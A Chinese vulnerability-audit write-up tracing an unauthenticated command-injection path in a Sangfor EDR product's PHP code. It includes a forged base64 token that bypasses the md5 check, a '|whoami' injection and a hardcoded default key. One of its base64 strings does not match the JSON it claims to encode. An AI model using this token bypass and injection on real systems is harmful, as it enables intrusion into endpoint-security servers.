                    $exec_slog_action = function($object,$params){\n    $data = $params[\"data\"];\n\n    if (!isset($data[\"params\"])) {\n        ldb_error(\"required parameter missing params is\".json_encode($params));\n        $object->err_code = EXEC_SLOG_ACTION_PARAM_ERROR;\n        return -1;\n    }\n\n    $data[\"params\"] = ldb_mapreduce_invoke(\"call_method\", \"app.web.common.validation.shell_injection_check\",\n        \"shell_argv_transform\", $data[\"params\"]);\n\n    $command = \"curl -k 'http:\/\/127.0.0.1:9081\/?\".$data[\"params\"].\"'\";\n    ldb_debug(\"exec command: \".$command);\n    ldb_exec($command, $output, $ret);\n    if ($ret !== 0) {\n        ldb_error(\"exec slog action fail, command: $command, error: \".$output);\n        $object->err_code = EXEC_SLOG_ACTION_FAILED;\n        return -1;\n    }\n\n    $data = $output;\n    response_linkage_dev_msg(SUCCESS,$data);\n    return 0;\n};\n<\/code><\/pre>\n\n
                    \u8fd9\u6bb5\u4ee3\u7801\u5f88\u5bb9\u6613\u7406\u89e3\uff0c\u8d4b\u503c\u6821\u9a8c\uff0c\u518d\u8fc7\u4e00\u904d \/bin\/mapreduce\/app\/web\/common\/validation\/shell_injection_check<\/code> \u6587\u4ef6 \u51fd\u6570 shell_argv_transform<\/code> :<\/p>\n\n
                    \/\/ \u8f6c\u4e49\u53c2\u6570\n$shell_argv_transform = function($argv) use(&$shell_argv_transform)\n{\n    $type = strtolower(gettype($argv));\n    if ($type == \"array\") \n    {\n        foreach ($argv as $key => $value)\n        {\n            $argv[$key] = $shell_argv_transform($value);\n        }\n    } \n    else if (!is_null($argv) && !empty($argv)) \n    {\n        $argv = escapeshellarg($argv);\n    }\n    \n    return $argv;\n};\n<\/code><\/pre>\n\n
                    \u8fd9\u5c31\u662f\u4e00\u6bb5\u7b80\u5355\u7684\u8f6c\u4e49\uff0c\u5982\u679c\u4f20\u5165\u7684\u53d8\u91cf $argv<\/code> \u662f\u6570\u7ec4\u5219\u904d\u5386\u8fdb\u884c\u51fd\u6570\u9012\u5f52\u6700\u540e\u901a\u8fc7 escapeshellarg<\/code> \u51fd\u6570\u8f6c\u4e49\uff08 \u5b98\u65b9\u91ca\u4e49: escapeshellarg() \u5c06\u7ed9\u5b57\u7b26\u4e32\u589e\u52a0\u4e00\u4e2a\u5355\u5f15\u53f7\u5e76\u4e14\u80fd\u5f15\u7528\u6216\u8005\u8f6c\u7801\u4efb\u4f55\u5df2\u7ecf\u5b58\u5728\u7684\u5355\u5f15\u53f7\uff0c\u8fd9\u6837\u4ee5\u786e\u4fdd\u80fd\u591f\u76f4\u63a5\u5c06\u4e00\u4e2a\u5b57\u7b26\u4e32\u4f20\u5165 shell \u51fd\u6570\uff0c\u5e76\u4e14\u8fd8\u662f\u786e\u4fdd\u5b89\u5168\u7684\u3002<\/strong> \uff09\uff0c\u5982\u679c\u4e0d\u662f\u6570\u7ec4\u5219\u76f4\u63a5\u8fdb\u884c\u589e\u52a0\u8f6c\u4e49\u3002<\/p>\n\n
                    \u7ee7\u7eed\u8ddf\u8fdb\u770b\u4ee3\u7801\uff0c\u4f60\u4f1a\u53d1\u73b0 $command = \"curl -k 'http:\/\/127.0.0.1:9081\/?\".$data[\"params\"].\"'\";<\/code> \u662f\u62fc\u63a5\u7684\uff0c\u6700\u540e\u7ecf\u8fc7 ldb_exec<\/code> \u8fdb\u884c\u547d\u4ee4\u6267\u884c\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u7ba1\u9053\u7b26\u7684\u65b9\u5f0f\u8fdb\u884c\u5176\u4ed6\u547d\u4ee4\u7684\u6ce8\u5165: |whoami<\/code>\uff0c\u4f46\u8fd9\u91cc\u5de7\u5999\u7684\u662f\u7ecf\u8fc7 escapeshellarg<\/code> \u51fd\u6570\u5904\u7406\u540e\u6ce8\u5165\u7684\u547d\u4ee4\u5c31\u53d8\u6210\u4e86 '|whoami'<\/code>\uff0c\u6700\u540e\u6267\u884c\u7684\u547d\u4ee4\u5c31\u53d8\u6210\u4e86: curl -k 'http:\/\/127.0.0.1:9081\/?'|whoami''<\/code>\uff0c\u76f4\u63a5\u5e2e\u52a9\u6211\u4eec\u95ed\u5408\u547d\u4ee4\u4e86\u3002<\/p>\n\n
                    \u90a3\u4e48\u6211\u4eec\u53ea\u9700\u8981\u53ef\u4ee5\u63a7\u5236 $params['data']['params']<\/code> \u7684\u503c\u5373\u53ef\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u3002<\/p>\n\n
                    \u63a7\u5236\u70b9\u5bfb\u627e<\/h2>\n\n
                    \/bin\/web\/dev_linkage_launch.php<\/h3>\n\n
                    get_opr \u51fd\u6570\u5206\u6790<\/h4>\n\n
                    \u7531\u4e8e \/bin\/mapreduce\/<\/code> \u4e0b\u7684\u6587\u4ef6\uff0c\u6211\u4eec\u6ca1\u529e\u6cd5\u76f4\u63a5\u8bbf\u95ee\u8c03\u7528\u5c31\u9700\u8981\u5168\u5c40\u641c\u7d22 exec_slog_action<\/code> \u770b\u4e0b\u8c01\u8c03\u7528\u4e86\u8fd9\u6bb5\u4ee3\u7801\uff0c\u53d1\u73b0\u6587\u4ef6 \/bin\/web\/dev_linkage_launch.php<\/code>\uff08 \u6b64\u5904\u5e94\u611f\u89c9\u5230\u5174\u594b\uff0c\u6bd5\u7adf\u6211\u4eec\u80fd\u8bbf\u95ee\u7684\u8def\u5f84\u5c31\u662f \/bin\/web\/<\/code> \uff09 \u6709\u4e00\u5904\u53ef\u7591\u51fd\u6570\u4f53\uff08 \u51fd\u6570 get_opr<\/code> \uff09 :<\/p>\n\n
                    function get_opr($req_url){\n    ...\n    \/\/CSSP\u8bf7\u6c42\n    if($req_url === STD_CSSP_EXEC_SLOG_ACTION_URL ){\n        return EXEC_SLOG_ACTION;\n    }\n    ...\n    \/\/\u68c0\u67e5url\u7684\u5408\u6cd5\u6027\n    if($req_url !== AGENT_INFO_URL &&\n       $req_url !== SCAN_ABOUT_URL &&\n       $req_url !== EDR_INFO_ABOUT_URL &&\n       $req_url !== EVIDENCE_INFO_URL){\n        ldb_error(\"no response about this url :\".$req_url);\n        throw new Exception(ldb_get_lang(\"NO_RESPONSE_ABOUT_THIS_URL\"));\n    }\n    \/\/\u83b7\u53d6url\u4e2d\u7684\u53c2\u6570\n    $url_params = get_url_param();\n    $method = $url_params[METHOD];\n    global $opr_arr;\n    if(isset($opr_arr[$method])){\n        $opr = $opr_arr[$method];\n    }\n    else{\/\/\u65e0\u6b64url\u7684\u54cd\u5e94\n        ldb_error(\"no response about this url: \" .$req_url);\n        throw new Exception(ldb_get_lang(\"NO_RESPONSE_ABOUT_THIS_URL\"));\n    }\n    return $opr;\n}\n<\/code><\/pre>\n\n
                    \u5224\u65ad\u53d8\u91cf $req_url<\/code> \u503c\u662f\u5426\u4e0e\u5e38\u91cf STD_CSSP_EXEC_SLOG_ACTION_URL<\/code> \u503c\u4e00\u81f4\uff0c\u4e00\u81f4\u5219\u8fd4\u56de\u5e38\u91cf EXEC_SLOG_ACTION<\/code>\uff0c\u6700\u540e\u5982\u679c\u8bf7\u6c42\u7684\u5730\u5740\u975e\u5e38\u91cf\u4e2d\u5b9a\u4e49\u7684\uff0c\u5219\u8fdb\u884cURL\u5224\u65ad\u5408\u6cd5\u6027\uff08 \u6211\u4eec\u6ca1\u529e\u6cd5\u76f4\u63a5\u8bbf\u95ee dev_linkage_launch.php<\/code> \uff09\u3002<\/p>\n\n
                    \u6211\u4eec\u5148\u770b\u5e38\u91cf STD_CSSP_EXEC_SLOG_ACTION_URL<\/code> \u5bf9\u5e94\u503c\uff0c\u76f4\u63a5\u770b\u4ee3\u7801\u5f00\u5934\u5305\u542b\u4e86\u54ea\u4e9b\u6587\u4ef6\u5373\u53ef :<\/p>\n\n
                    \"-w938\"<\/p>\n\n
                    \u6700\u7ec8\u53d1\u73b0 \/bin\/mapreduce\/app\/web\/device_linkage\/common\/common.php<\/code> \u4e2d\u5b9a\u4e49\u4e86\u5e38\u91cf :<\/p>\n\n
                    define(\"STD_CSSP_EXEC_SLOG_ACTION_URL\",\"\/api\/edr\/sangforinter\/v2\/cssp\/slog_client\");\n<\/code><\/pre>\n\n
                    define(\"EXEC_SLOG_ACTION\",\"exec_slog_action\");\n<\/code><\/pre>\n\n
                    \u77e5\u9053\u4e86\u8fd9\u4e9b\u5e38\u91cf\u7684\u5b9a\u4e49\uff0c\u5927\u81f4\u5c31\u660e\u767d\u4e86\uff0c\uff08 \u731c\u6d4b \uff09<\/strong>\u5f53\u6211\u4eec\u8bbf\u95ee \/api\/edr\/sangforinter\/v2\/cssp\/slog_client<\/code> \u65f6\uff0c\u51fd\u6570 get_opr<\/code> \u8fd4\u56de exec_slog_action<\/code>\uff0c\u4e5f\u5c31\u662f\u6211\u4eec\u4e4b\u524d\u6240\u53d1\u73b0\u5b58\u5728\u5b89\u5168\u98ce\u9669\u7684\u51fd\u6570\uff0c\u8fd9\u4e5f\u4ec5\u4ec5\u662f\u731c\u6d4b\uff0c\u4f46\u60f3\u8981\u8bc1\u5b9e\u8fd9\u4e2a\u731c\u6d4b\uff0c\u6211\u4eec\u5c31\u5f97\u5543\u4e00\u5543\u6587\u4ef6 \/bin\/web\/dev_linkage_launch.php<\/code>\u3002<\/p>\n\n
                    get_interface_data \u51fd\u6570\u5206\u6790<\/h4>\n\n
                    \u6211\u4eec\u5df2\u7ecf\u77e5\u9053\u4e86\u51fd\u6570 get_opr<\/code> \u7684\u4f5c\u7528\uff08 \u8fd4\u56de\u63a5\u53e3\u65b9\u6cd5 \uff09\uff0c\u6765\u770b\u770b\u5728\u6587\u4ef6\u4e2d\u7684\u54ea\u91cc\u88ab\u8c03\u7528\uff0c\u53d1\u73b0\u4e00\u5904\u8c03\u7528 :<\/p>\n\n
                    function get_interface_data($argv) {\n    \/\/\u83b7\u53d6url\n    $req_url = $_SERVER['PHP_SELF'];\n    \/\/\u6821\u9a8ctoken\n    check_token($req_url);\n    \/\/\u6784\u9020opr\n    $opr = get_opr($req_url);\n    \/\/\u6839\u636e\u65b9\u6cd5\u6784\u9020\u4e1a\u52a1\u4ee3\u7801\u8def\u5f84\n    $app_name = get_app_name($opr);\n    $data = array();\n    if($_SERVER['REQUEST_METHOD'] == 'POST'){\n        $data = get_body_data($argv);\n    }\n    \/\/\u6839\u636eopr\u3001app_name\u4ee5\u53cadata\u6784\u9020\u6570\u636e\n    $interface_data = array();\n    $interface_data[\"app_args\"][\"name\"] = $app_name;\n    $interface_data[\"opr\"] = $opr;\n    if($_SERVER['REQUEST_METHOD'] == 'POST'){\n        $interface_data[\"data\"] = $data;\n    }\n    return $interface_data;\n}\n<\/code><\/pre>\n\n
                    \u51fd\u6570 get_interface_data<\/code> \u8c03\u7528\u4e86\u51fd\u6570 get_opr<\/code>\uff0c\u4f20\u9012\u53c2\u6570\u503c\u4e3a $req_url = $_SERVER['PHP_SELF'];<\/code>\uff0c\u4e5f\u5c31\u662f\u8bf7\u6c42\u7684 URI<\/code> ( \u4f8b\u5982\u8bf7\u6c42\u5730\u5740\u4e3a http:\/\/localhost\/chen.php<\/code> \u90a3\u4e48 $_SERVER['PHP_SELF']<\/code> \u7684\u503c\u5373\u4e3a \/chen.php<\/code> )\u3002<\/p>\n\n
                    \u6ce8<\/strong>\uff1a\u8fd9\u91cc\u8bc1\u5b9e\u4e86\u6211\u4eec\u5728\u5206\u6790 get_opr<\/code> \u51fd\u6570\u65f6\u7684\u731c\u6d4b\uff0c\u8bf7\u6c42\u7684\u5730\u5740\u5fc5\u987b\u4e3a \/bin\/mapreduce\/app\/web\/device_linkage\/common\/common.php<\/code> \u6587\u4ef6\u4e2d\u5b9a\u4e49\u5e38\u91cf\u7684\u5730\u5740\uff0c\u4e0d\u80fd\u4e3a dev_linkage_launch.php<\/code>\u3002<\/p>\n\n
                    \u90a3\u4e48\u60f3\u8981\u8fdb\u5165\u8c03\u7528\u51fd\u6570 get_opr<\/code> \u7684\u903b\u8f91\uff0c\u6211\u4eec\u9700\u8981\u5148\u4e86\u89e3\u4e0b\u51fd\u6570 get_interface_data<\/code> \u7684\u903b\u8f91\uff0c\u5728\u6b64\u4e4b\u524d\u6211\u4eec\u9700\u8981\u786e\u4fdd\u81ea\u5df1\u4e0d\u4f1a\u505a\u65e0\u7528\u529f<\/strong>\uff0c\u6240\u4ee5\u9700\u8981\u770b\u4e0b\u51fd\u6570 get_interface_data<\/code> \u662f\u5426\u5728\u4e0a\u4e0b\u6587\u4ee3\u7801\u4e2d\u88ab\u8c03\u7528 :<\/p>\n\n
                    \"-w711\"<\/p>\n\n
                    \"-w289\"<\/p>\n\n
                    \u8be5\u51fd\u6570\u76f4\u63a5\u88ab\u5165\u53e3\u51fd\u6570\u8c03\u7528\uff0c\u90a3\u4e48\u6211\u4eec\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u5206\u6790\u4e0b\u8be5\u51fd\u6570\u903b\u8f91\uff0c\u6839\u636e\u6ce8\u91ca\u6211\u4eec\u4e86\u89e3\u5230\u8fd9\u91cc\u4f1a\u6821\u9a8ctoken\uff0c\u4e5f\u5c31\u662f\u51fd\u6570 check_token<\/code>\u3002<\/p>\n\n
                    check_token \u7ed5\u8fc7<\/h5>\n\n
                    \u8ddf\u8fdb\u51fd\u6570 check_token<\/code>\uff0c\u5176\u4ee3\u7801\u5982\u4e0b :<\/p>\n\n
                    \/**\n * @func        \u68c0\u9a8ctoken\n * @param       string $req_url \u8054\u52a8\u7684url\n * @throws      Exception\n *\/\nfunction check_token($req_url){\n    \/\/CSSP\u63a5\u53e3\u4f7f\u7528\u7279\u6743IP\u7684\u65b9\u5f0f\u8fdb\u884c\u6821\u9a8c\n    if (strpos($req_url, STD_CSSP_REQUEST_URL_PREFIX) !== false && $req_url != STD_CSSP_SET_KEY_URL) {\n        parse_str($_SERVER['QUERY_STRING'],$query_str_parsed);\n        if(!isset($query_str_parsed[TOKEN])) {\n            throw new Exception(ldb_get_lang(\"THIS_OPERATION_NEED_TOKEN\"));\n        }\n        $ret = check_access_token($query_str_parsed[TOKEN], $req_url);\n        if ($ret == 1) {\n            response_linkage_dev_msg(CSSP_TOKEN_AUTH_FAILED);\n            die();\n        }\n    }\n    \/\/\u5224\u65adurl \u9700\u4e0d\u9700\u8981\u8fdb\u884c\u6821\u9a8ctoken\n    if($req_url == AGENT_INFO_URL ||\n       $req_url == SCAN_ABOUT_URL ||\n       $req_url == EDR_INFO_ABOUT_URL ||\n       $req_url == EVIDENCE_INFO_URL){\n        \/\/\u6821\u9a8ctoken\n        $url_params = get_url_param();\n        $ret = token_valid($url_params[TOKEN]);\n        if($ret){\n            response_linkage_dev_msg($ret);\n            die();\n        }\n    }\n}\n<\/code><\/pre>\n\n
                    \u7b80\u5355\u7406\u89e3\u5c31\u662f\u83b7\u53d6\u6240\u6709\u8bf7\u6c42\u53c2\u6570\uff0c\u5e76\u83b7\u53d6\u53c2\u6570 token<\/code> \u7684\u503c\u5e26\u5165\u51fd\u6570 check_access_token<\/code>\uff0c\u6700\u540e\u7684\u8fd4\u56de\u7ed3\u679c\u4e0d\u4e3a 1<\/code> \u5373\u53ef\u6210\u529f\u9a8c\u8bc1token\uff0c\u6211\u4eec\u7ee7\u7eed\u8ddf\u8fdb\u8be5\u51fd\u6570\uff0c\u6587\u4ef6 \/bin\/web\/ui\/php\/platform.php<\/code> :<\/p>\n\n
                    \/**\n * \u68c0\u9a8ccssp\u8bf7\u6c42\u7684token\n * @return 0\/1 \u6210\u529f\/\u5931\u8d25\n *\/\nfunction check_access_token($access_token, $req_url){\n\n    $token_str = base64_decode($access_token);\n    $json_token = json_decode($token_str, true);\n    $key = get_item_from_os_json(\"privateKey\");\n    if($key == \"\" && $req_url == STD_CSSP_DOWN_CONF_URL) {\n        $key = STD_CSSP_DEFAULT_KEY;\n    }\n    $md5_str = md5($key.$json_token[\"random\"]);\n    if($md5_str == $json_token[\"md5\"]) {\n        return 0;\n    }\n\n    ldb_error(\"check token failed\");\n    return 1;\n}\n<\/code><\/pre>\n\n
                    \u53c2\u6570 token<\/code> \u7684\u503c\u9700\u8981\u7ecf\u8fc7Base64\u89e3\u7801\u3001JSON\u8f6c\u6362\uff08 \u5c06JSON\u8f6c\u4e3a\u6570\u7ec4 \uff09\uff0c\u6700\u540e\u5b57\u6bb5 random<\/code> \u4e0e\u53d8\u91cf $key<\/code> \u62fc\u63a5\u8fdb\u884cmd5\u52a0\u5bc6\u7684\u503c\u4e0e\u5b57\u6bb5 md5<\/code> \u4e00\u6837\u5219\u53ef\u4ee5\u8fdb\u5165 return 0;<\/code> \u5426\u5219\u5c31\u662f return 1;<\/code>\uff08 \u6211\u4eec\u5c31\u9700\u8981\u8fd4\u56de\u4e3a0\u624d\u53ef\u8fc7token\u9a8c\u8bc1 \uff09\u3002<\/p>\n\n
                    \u90a3\u5728\u8fd9\u6211\u4eec\u9700\u8981\u77e5\u9053\u53d8\u91cf $key<\/code> \u662f\u600e\u4e48\u6837\u83b7\u53d6\u5230\u7684\uff0c\u8ddf\u8fdb\u51fd\u6570 get_item_from_os_json<\/code> :<\/p>\n\n
                    \/**\n * \u4ece\/etc\/cssp_custom_image\/os.json\u4e2d\u83b7\u53d6\u6307\u5b9a\u503c\n * @param $key os.json\u4e2d\u7684\u952e\n * @return \u8fd4\u56de\u6307\u5b9a\u952e\u5bf9\u5e94\u7684\u503c\n *\/\nfunction get_item_from_os_json($key){\n    $item = \"\";\n\n    $file_path = \"\/etc\/cssp_custom_image\/os.json\";\n    if(file_exists($file_path)){\n        $os_json = get_json_from_file($file_path);\n        if ($os_json === null) {\n            ldb_error(\"target file is null\");\n            return \"\";\n        }\n        $item = $os_json[$key];\n    }\n\n    return $item;\n}\n<\/code><\/pre>\n\n
                    \u53d1\u73b0\u8fd9\u91cc\u5b9e\u9645\u610f\u4e49\u4e0a\u5c31\u662f\u5c06 $file_path = \"\/etc\/cssp_custom_image\/os.json\";<\/code> \u5e26\u5165 get_json_from_file<\/code> \u51fd\u6570\uff0c\u7ee7\u7eed\u8ddf\u8fdb\u8fd9\u4e2a\u51fd\u6570 :<\/p>\n\n
                    \/**\n * \u4ece\u6587\u4ef6\u8bfb\u53d6\u4e00\u4e2ajson\n * @param conf_file \u6587\u4ef6\u8def\u5f84+\u6587\u4ef6\u540d\n * @return data_arry \u8fd4\u56de\u4e00\u4e2a\u5173\u8054\u6570\u7ec4\n*\/\nfunction get_json_from_file($conf_file){\n    if (!file_exists($conf_file)) {\n        ldb_error(\"err:file null\");\n        return null;\n    }\n\n    $json_string = file_get_contents($conf_file);\n    $data_arry = json_decode($json_string, true);\n\n    if (is_null($data_arry)) {\n        ldb_error(\"get json from file failed\");\n        return null;\n    }\n\n    return $data_arry;\n}\n<\/code><\/pre>\n\n
                    \u8be5\u51fd\u6570\u5c31\u662f\u4ece\u6587\u4ef6\u4e2d\u8bfb\u53d6JSON\uff0c\u5e76\u8f6c\u4e3a\u6570\u7ec4\u8fd4\u56de\uff0c\u6211\u4eec\u60f3\u8981\u77e5\u9053\u5177\u4f53\u5185\u5bb9\u5c31\u8981\u770b\u4e0b\u521d\u59cb\u7684 \/etc\/cssp_custom_image\/os.json<\/code> \u6587\u4ef6\u5185\u5bb9\uff0c\u4f46\u7b14\u8005\u8fd9\u91cc\u5b89\u88c5\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u8be5\u6587\u4ef6\u662f\u4e0d\u5b58\u5728\u7684 :<\/p>\n\n
                    \"-w1076\"<\/p>\n\n
                    \u90a3\u5728\u8fd9\u91cc\u5176\u8fd4\u56de\u7684\u5c31\u662f\u7a7a\uff0c\u8fd9\u65f6\u5019\u6211\u4eec\u518d\u56de\u5230\u51fd\u6570 check_access_token<\/code>\uff0c\u5176\u4ee3\u7801\uff08 \u4ee3\u7801\u4e0a\u6587\u4e2d\u5df2\u7ecf\u5217\u51fa \uff09\u903b\u8f91\u5f53\u53d8\u91cf $key<\/code> \u503c\u4e3a\u7a7a\u5e76\u4e14 $req_url == STD_CSSP_DOWN_CONF_URL<\/code>\uff08 define(\"STD_CSSP_DOWN_CONF_URL\",\"\/api\/edr\/sangforinter\/v2\/cssp\/down_conf\");<\/code>\n \uff09 \u7684\u60c5\u51b5\u4e0b\u53d8\u91cf $key<\/code> \u503c\u4e3a\u5e38\u91cf STD_CSSP_DEFAULT_KEY<\/code>  \u7684\u503c\uff0c\u5373: define(\"STD_CSSP_DEFAULT_KEY\",\"amsPnhHqfN5Ld5FU\");<\/code>\uff08 \u5e38\u91cf\u5b9a\u4e49\u5728 \/bin\/mapreduce\/app\/web\/device_linkage\/common\/common.php<\/code> \u6587\u4ef6\u4e2d \uff09\u3002<\/p>\n\n
                    \u4f46\u6b64\u5904\u6211\u4eec\u7684\u53d8\u91cf $req_url<\/code> \u4e3a \/api\/edr\/sangforinter\/v2\/cssp\/slog_client<\/code> \u5e76\u4e0d\u7b26\u5408\u903b\u8f91\u6761\u4ef6\uff0c\u6240\u4ee5\u53d8\u91cf $key<\/code> \u8fd8\u662f\u4e3a\u7a7a\u7684\u3002<\/p>\n\n
                    \u90a3\u6211\u4eec\u53ef\u4ee5\u6839\u636e\u4ee3\u7801\u903b\u8f91\u76f4\u63a5\u6784\u5efatoken\u503c\uff0c\u9996\u5148\u662fJSON\u5185\u5bb9\u6709\u4e24\u4e2a\u5b57\u6bb5random\u3001md5\uff0c\u8fd8\u8981\u6ee1\u8db3\u5b57\u6bb5md5\u7684\u503c\u7b49\u4e8emd5(\u5b57\u6bb5random)<\/code>\u7684\u503c\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u63d0\u524d\u5148\u8bbe\u7f6e\u5b57\u6bb5random\u4e3a1\uff0c\u968f\u540e\u8fdb\u884cmd5\u52a0\u5bc6\u5e76\u5c06\u7ed3\u679c\u8d4b\u4e88\u5b57\u6bb5md5\u5373\u53ef :<\/p>\n\n
                    \"-w374\"<\/p>\n\n
                    {\"random\":\"1\", \"md5\":\"c4ca4238a0b923820dcc509a6f75849b\"}\n<\/code><\/pre>\n\n
                    \u6700\u540e\u8fdb\u884cBase64\u7f16\u7801 : eyJyYW5kb20iOiIxMjMiLCAibWQ1IjoiYWI0NzU2M2FjNmZiOWU1MTdiZTg4ODBjODdmNzc2NWYifQ==<\/code><\/p>\n\n
                    \u81f3\u6b64\u6211\u4eec\u5c31\u7ed5\u8fc7\u4e86token\u6821\u9a8c\u9650\u5236\u3002<\/p>\n\n
                    \u903b\u8f91\u68b3\u7406<\/h5>\n\n
                    \u6211\u4eec\u6765\u68b3\u7406\u51fd\u6570 get_interface_data<\/code> \u7684\u903b\u8f91\uff0c\u5176\u901a\u8fc7\u51fd\u6570 get_opr<\/code> \u53cd\u56de\u503c\u5e26\u5165\u51fd\u6570 get_app_name<\/code> \u83b7\u53d6\u5177\u4f53\u4ee3\u7801\u8def\u5f84\uff0c\u800c\u540e\u5f53HTTP\u8bf7\u6c42\u7c7b\u578b\u4e3aPOST\u65f6\u83b7\u53d6\u8bf7\u6c42\u6b63\u6587\uff08 POST\u6570\u636e\uff0c\u5982\u4e0b\u51fd\u6570 get_body_data<\/code>\uff0c\u5c06\u8bf7\u6c42\u6b63\u6587\u7684JSON\u8f6c\u4e3a\u6570\u7ec4 \uff09\uff0c\u901a\u8fc7\u6784\u5efa\u6570\u7ec4\u5c06\u6570\u636e\u586b\u5145\u8fdb\u53bb\uff0c\u5e76\u8fd4\u56de\u8be5\u6570\u7ec4\u3002\uff08 \u7b80\u5355\u68b3\u7406\uff0c\u5177\u4f53\u8bf7\u770b\u4ee3\u7801 \uff09<\/p>\n\n
                    \/**\n * @fun        \u6839\u636e\u534f\u8baebody\u4e2d\u7684\u5185\u5bb9\u6765\u6784\u9020data\u4e2d\u7684\u5185\u5bb9\n * @param      array     $argv      \u8f93\u5165\u7684\u53c2\u6570\n * @return     array     $params    \u8054\u52a8\u8bbe\u5907\u4f20\u6765\u7684body\n *\/\nfunction get_body_data($argv){\n    $ini_file = getenv(\"EPS_INSTALL_ROOT\") . \"config\/tenant.conf\";\n    if(file_exists($ini_file)){\n        if (0 != strlen(ldb_post_json())) {\n            $docker_data = ldb_get_post($argv);\n            return $docker_data;\n        }\n    }\n\n    $params = array();\n    if(0 != strlen(ldb_post_json())) {\n        $params = ldb_get_post($argv);\n    }\n    return $params;\n}\n<\/code><\/pre>\n\n
                    \u6211\u4eec\u5df2\u7ecf\u77e5\u9053\u4e86\u51fd\u6570 get_interface_data<\/code> \u7684\u903b\u8f91\uff0c\u518d\u8ddf\u8fdb\u8c03\u7528\u5176\u7684\u51fd\u6570 ldb_execute_app<\/code> \u5373\u53ef\u3002<\/p>\n\n
                    ldb_execute_app \u51fd\u6570\u5206\u6790<\/h4>\n\n
                    \u9605\u8bfb\u8fc7\u00ab\u5bf9\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u6743\u9650\u7ed5\u8fc7<\/strong>\u6f0f\u6d1e\u7684\u5ba1\u8ba1\u6d41\u7a0b\u00bb\u8be5\u5206\u4eab\u7684\u8bfb\u8005\uff0c\u5927\u81f4\u5c31\u80fd\u7406\u89e3\u8fd9\u91cc\u51fd\u6570\u7684\u4f5c\u7528\u4e86\uff1a<\/p>\n\n
                    \/**\n * @func      APP\u901a\u7528\u5165\u53e3\u51fd\u6570\uff0c\u5c06\u8054\u52a8\u53d1\u6765\u7684\u4fe1\u606f\u8f6c\u6362\u6210EDR\u901a\u7528\u7684\u524d\u540e\u7aef\u63a5\u53e3\n * @param     array    $args   \u8f93\u5165\u7684\u53c2\u6570\n *\/\nfunction ldb_execute_app($args) {\n    try {\n\n        \/\/\u6784\u9020\u6210\u4e1a\u52a1\u7edf\u4e00\u5904\u7406\u7684\u63a5\u53e3\n        $interface_data = get_interface_data($args);\n        \/\/ \u68c0\u9a8c\u8bf7\u6c42\u4fe1\u606f\u662f\u5426\u5305\u542b\u6ce8\u5165\u5173\u952e\u5b57\n        $ignore_check = read_ignore_check_info();\n        if(mongo_injection_check($interface_data, $ignore_check) === TRUE) \n        {\n            response_linkage_dev_die_msg(ldb_get_lang(ARGV_CONTAIN_RISK), RESPONSE_ERROR);\n            ldb_error(\"request argv contain mongodb risk keyword, argv=\" . json_encode($interface_data));\n            return ;\n        }\n\n        \/\/\u7279\u6b8a\u5f00\u6743\u9650\u63a7\u5236\u51fd\u6570\n        special_auth($interface_data);\n        \/\/\u6388\u6743\u63a7\u5236\n        authorize_check($interface_data);\n        ldb_debug(\"interface_data is \" . json_encode($interface_data));\n        $app = $interface_data[\"app_args\"][\"name\"];\n        $constructor = ldb_mapreduce_invoke(\"get\", $app);\n        \/\/ \u6784\u5efa\u5e94\u7528\u5bf9\u8c61\n        $instance = call_user_func($constructor);\n        $ret = call_user_func($instance->main, $instance, $interface_data);\n        \/\/\u54cd\u5e94\u51fa\u9519\u8fd4\u56de\u76f8\u5e94\u7684\u72b6\u6001\u7801\n        if ($ret) {\n            $err_code = call_user_func($instance->res, $instance);\n            response_linkage_dev_msg($err_code);\n        }\n        \/\/ \u9500\u6bc1\u5e94\u7528\u5bf9\u8c61\n        call_user_func($instance->destroy, $instance);\n    }\n    catch(Exception $e){\n        \/\/\u901a\u77e5\u8054\u52a8\u8bbe\u5907\n        $err_msg = $e->getMessage();\n        response_linkage_dev_die_msg($err_msg, RESPONSE_ERROR);\n    }\n}\n\n\/\/ \u5165\u53e3\u51fd\u6570\n$args = ldb_argv_get();\nldb_execute_app($args);\n<\/code><\/pre>\n\n
                    ldb_execute_app<\/code> \u51fd\u6570\u4f20\u5165\u53c2\u6570\u4e3a\u53d8\u91cf $args<\/code>\uff0c\u8be5\u503c\u901a\u8fc7\u51fd\u6570 ldb_argv_get<\/code> \u83b7\u53d6\uff0c\u8ddf\u8fdb\u53d1\u73b0\u5c31\u662f\u83b7\u53d6\u7684 URI \u90e8\u5206\u3002<\/p>\n\n
                    \/**\n * \u83b7\u53d6\u547d\u4ee4\u884c\u53c2\u6570\n * @return array \u8fd4\u56de\u547d\u4ee4\u884c\u53c2\u6570\n *\/\nfunction ldb_argv_get() {\n    if (ldb_is_cli()) {\n        global $argv;\n        return $argv;\n    }\n    $args = array($_SERVER['PHP_SELF']);\n    return $args;\n}\n<\/code><\/pre>\n\n
                    \u903b\u8f91\u68b3\u7406\u4e0e\u6f0f\u6d1e\u5229\u7528<\/h2>\n\n
                    \u7531\u4e8e\u4e4b\u524d\u7684\u6b65\u9aa4\u90fd\u662f\u9006\u63a8\uff0c\u8fd9\u91cc\u6211\u4eec\u76f4\u63a5\u987a\u7740\u63a8\u4e00\u904d\u6d41\u7a0b\u5c31\u80fd\u7406\u6e05\u6574\u4e2a\u601d\u8def\u4e86\u3002<\/p>\n\n
                    \u5047\u8bbe\u5728\u6b64\u6211\u4eec\u8bbf\u95ee\u7684\u662f \/api\/edr\/sangforinter\/v2\/cssp\/slog_client<\/code>\uff0c\u90a3\u5c31\u662f\u5176\u4f20\u5165\u51fd\u6570 get_interface_data<\/code>\uff0c\u7531\u4e8e\u9700\u8981\u8fc7 check_token<\/code>\uff0c\u6240\u4ee5\u8bbf\u95ee\u5730\u5740\u9700\u4e3a \/api\/edr\/sangforinter\/v2\/cssp\/slog_client?token=eyJyYW5kb20iOiIxIiwgIm1kNSI6ImM0Y2E0MjM4YTBiOTIzODIwZGNjNTA5YTZmNzU4NDliIn0=<\/code>\u3002<\/p>\n\n
